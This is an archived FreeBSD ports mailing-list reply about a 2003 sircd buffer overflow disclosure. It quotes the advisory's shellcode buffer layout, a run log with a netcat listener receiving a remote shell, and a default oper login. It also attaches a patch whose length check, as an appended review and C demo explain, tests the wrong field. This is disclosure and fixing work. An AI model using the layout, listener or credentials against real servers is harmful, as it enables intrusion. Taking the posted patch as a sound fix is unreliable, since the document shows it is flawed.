From owner-freebsd-ports Tue Feb 4 2:34:47 2003
Delivered-To: freebsd-ports@freebsd.org
Message-ID: <3E3F975C.9070109@barrysworld.com>
Date: Tue, 04 Feb 2003 10:35:08 +0000
From: Zarjazz <zarjazz@barrysworld.com>
To: Knud Erik Højgaard
Cc: ports@freebsd.org
Subject: Re: sircd buffer overflow
In-Reply-To: <002901c2cbd0$1ded9220$24029dd9@tuborg>

Thanks for the info, but I'd like to say that the BSD ports version of sircd is / was nothing to do with me, and v0.4.0 was the initial alpha release and is now more than 1 year old compared to the current CVS tree, so someone has not been keeping the source up to date!

> II. DESCRIPTION
>
> a: Insufficient bounds checking leads to execution of arbitrary code.

Patch attached to sanity check the DNS lookup; however, I see this more as a bug than an exploit, as you need root access on the system before you actually edit /etc/hosts in the first place. I would be interested to know if the current CVS version is affected in the same way, as a lot has changed since the 0.4.x tree.
> b: Default oper account matching *!*@*

In all my releases I only ever included an example.conf file under docs/, so I can't take the blame for anyone running a server with an unaltered config file :)

Zarjazz

Knud Erik Højgaard wrote:
> A heads up..
>
> ------------------------------------------------------------------------
>
> I. BACKGROUND
>
> According to the vendor "The 'sircd' project started as an idea from
> the QuakeNet IRC Network coding team to develop a completely new irc
> server that had none of the problems of the original ircd, such as
> instability, scalability issues, redundant, badly written code and
> other nasty things. "
> More info is available at http://www.sircd.org.
>
> II. DESCRIPTION
>
> a: Insufficient bounds checking leads to execution of arbitrary code.
> b: Default oper account matching *!*@*
>
> III. ANALYSIS
>
> a:
> Upon checking the reverse dns of a connecting user, if the returned
> value is longer than a certain length a classic stack overflow occurs.
>
> The buffer may be constructed as such:
> [94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
> leaving us with plenty of space both before and after eip to store our
> shellcode.
>
> The accompanying .sh script is a silly proof of concept.
> Below is a fabricated copy of a typical run:
>
> [shell 1]
> $ nc -l -v -p 10000
> listening on [any] 10000 ...
>
> [shell 2]
> # ./sircd.sh 127.0.0.1
>
> sircd 0.4.0 proof-of-concept, usage ./sircd.sh
>
> UID check passed, backing up /etc/hosts
> Now connect to the sircd from 127.0.0.1
> Press a key and enter to restore /etc/hosts
> asd
> Game over man, game over
> #
>
> [shell 3]
> $ sircd &
> [1] 75711
> $
>
> =====================================
> sircd: v0.4.0 Alpha
> Author(s)
> Zarjazz (zarjazz@barrysworld.com)
> =====================================
> sircd initialized
> SSL initialized
>
> $ BitchX 127.0.0.1
> [snip some bitchx output]
> [fi] *** Welcome to the_server
> [fi] *** Resolving IP 127.0.0.1
> --from here on the connection freezes.
>
> [shell 2]
> fah
> Game over man, game over
> #
>
> [shell 1]
> connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
> id
> uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)
>
> b: type /oper bod bod bod in a connected irc-client.
>
> IV. DETECTION
>
> sircd-0.4.0 shipping with FreeBSD ports as well as from www.sircd.org
> as per 03/02-03 is found to be vulnerable.
>
> V. WORKAROUND
>
> unknown
>
> VI. VENDOR FIX
>
> unknown
>
> VII. CVE INFORMATION
>
> unknown
>
> VIII. DISCLOSURE TIMELINE
>
> 03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
>
> IX. CREDIT
>
> Knud Erik Højgaard

Content-Disposition: inline; filename="sircd.patch"

diff -rubBN sircd-0.4.0/sircd/src/ircd_callbacks.c sircd-0.4.0.fix/sircd/src/ircd_callbacks.c
--- sircd-0.4.0/sircd/src/ircd_callbacks.c	Sat Feb 2 17:44:49 2002
+++ sircd-0.4.0.fix/sircd/src/ircd_callbacks.c	Tue Feb 4 10:12:37 2003
@@ -314,7 +314,7 @@
 {
 /* not cached, so do a dns lookup of the ip address */
 struct hostent *host_ent = gethostbyaddr((char * ) &addr.sin_addr, sizeof(addr.sin_addr), AF_INET);
- if (host_ent)
+ if (host_ent && host_ent->h_length < HOSTLEN)
 ip_tree->left = (void *) str_dup(host_ent->h_name);
 else
 ip_tree->left = (void *) str_dup(cl_ip);
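Review bot: the condition on the `+` line, `host_ent->h_length < HOSTLEN`, tests the wrong field. In `struct hostent`, `h_length` is the size in bytes of the addresses in `h_addr_list` (4 for the AF_INET lookup this hunk performs), not the length of `h_name`, so the test is true for every IPv4 answer and a reverse-DNS name longer than HOSTLEN still reaches `str_dup(host_ent->h_name)` and from there the fixed-size buffer the advisory says is overflowed. Bound the string that is actually copied, e.g. `if (host_ent && strlen(host_ent->h_name) < HOSTLEN)`, and because this gate sits at one resolver path only (the /etc/hosts route in the advisory is just one way to feed a long name), any later copy of `ip_tree->left` into a HOSTLEN-sized buffer should be length-limited as well. A one-line comment saying why the length is checked here would help whoever touches this next.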
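An added example, written for this page and not taken from sircd or the advisory, showing the difference between testing `h_length` (the address size, which is what the attached patch compares against HOSTLEN) and testing `strlen(h_name)`, next to a bounded copy of the resolver result that falls back to the client IP the way the patch's `else` branch does. It builds a `struct hostent` inline so nothing is resolved over the network. The value `HOSTLEN = 63`, the function names, and the return-value convention are assumptions for the demonstration, not sircd's code.

```c
/* Added example (not sircd code): bounding a reverse-DNS result before it
 * is copied into a fixed-size hostname buffer.  Runs fully offline. */
#include <netdb.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

#define HOSTLEN 63  /* assumed size of the hostname buffer; sircd's real value is not on the page */

/* Emulates the condition in the posted patch.  h_length is the size of the
 * addresses in h_addr_list (4 for AF_INET), so this accepts any IPv4 answer
 * no matter how long h_name is. */
static int patch_check(const struct hostent *he)
{
    return he != NULL && he->h_length < HOSTLEN;
}

/* The bound that actually matters: the string about to be copied. */
static int name_fits(const struct hostent *he)
{
    return he != NULL && he->h_name != NULL && strlen(he->h_name) < HOSTLEN;
}

/* The vulnerable shape the advisory describes: an unbounded copy of the
 * reverse-DNS name into a fixed HOSTLEN buffer.  Only ever called with a
 * short literal below; with a long h_name it would smash the stack. */
static void copy_unbounded(char dst[HOSTLEN], const char *h_name)
{
    strcpy(dst, h_name);
}

/* Hardened equivalent: store the name only if it fits, otherwise fall back
 * to the client IP (the same fallback the patch takes).  Returns the number
 * of name bytes stored, or -1 when the fallback was used. */
static int set_client_host(const struct hostent *he, const char *cl_ip,
                           char dst[HOSTLEN])
{
    int used_name = name_fits(he);
    const char *src = used_name ? he->h_name : cl_ip;
    size_t n = strlen(src);
    if (n >= HOSTLEN)          /* cl_ip is ours, but never trust an unchecked length */
        n = HOSTLEN - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return used_name ? (int)n : -1;
}

/* Constructed resolver answer: a normal 127.0.0.1 record whose h_name is
 * whatever the caller supplies (the part an attacker controls). */
static struct hostent make_answer(char *name)
{
    static char addr[4] = {127, 0, 0, 1};
    static char *addr_list[] = {addr, NULL};
    static char *aliases[] = {NULL};
    struct hostent he;
    memset(&he, 0, sizeof he);
    he.h_name = name;
    he.h_aliases = aliases;
    he.h_addrtype = AF_INET;
    he.h_length = 4;
    he.h_addr_list = addr_list;
    return he;
}

/* Scenario from the advisory: a 511-byte name.  Returns 1 when the patch's
 * check wrongly accepts it while the strlen check rejects it and the IP is
 * stored instead. */
static int demo_long_name(void)
{
    char name[512], host[HOSTLEN];
    struct hostent he;
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    he = make_answer(name);
    return patch_check(&he) == 1
        && name_fits(&he) == 0
        && set_client_host(&he, "127.0.0.1", host) == -1
        && strcmp(host, "127.0.0.1") == 0;
}

/* Benign case: a short name passes both checks and is stored verbatim. */
static int demo_short_name(void)
{
    char name[] = "irc.example.net", host[HOSTLEN];
    struct hostent he = make_answer(name);
    return patch_check(&he) == 1
        && name_fits(&he) == 1
        && set_client_host(&he, "127.0.0.1", host) == 15
        && strcmp(host, "irc.example.net") == 0;
}

int main(void)
{
    char host[HOSTLEN];
    copy_unbounded(host, "localhost");   /* safe only because the literal is short */
    printf("short literal via unbounded copy: %s\n", host);
    printf("long name: patch check fooled, strlen check holds: %s\n",
           demo_long_name() ? "yes" : "no");
    printf("short name stored verbatim: %s\n", demo_short_name() ? "yes" : "no");
    return 0;
}
```

The point of `demo_long_name` is that a 511-byte `h_name` sails through `patch_check` because `h_length` is still 4; only `name_fits` looks at the string that will be copied. `set_client_host` also clamps the fallback, since a length check that covers one source but not the other is the kind of gap the advisory's /etc/hosts trick exploits.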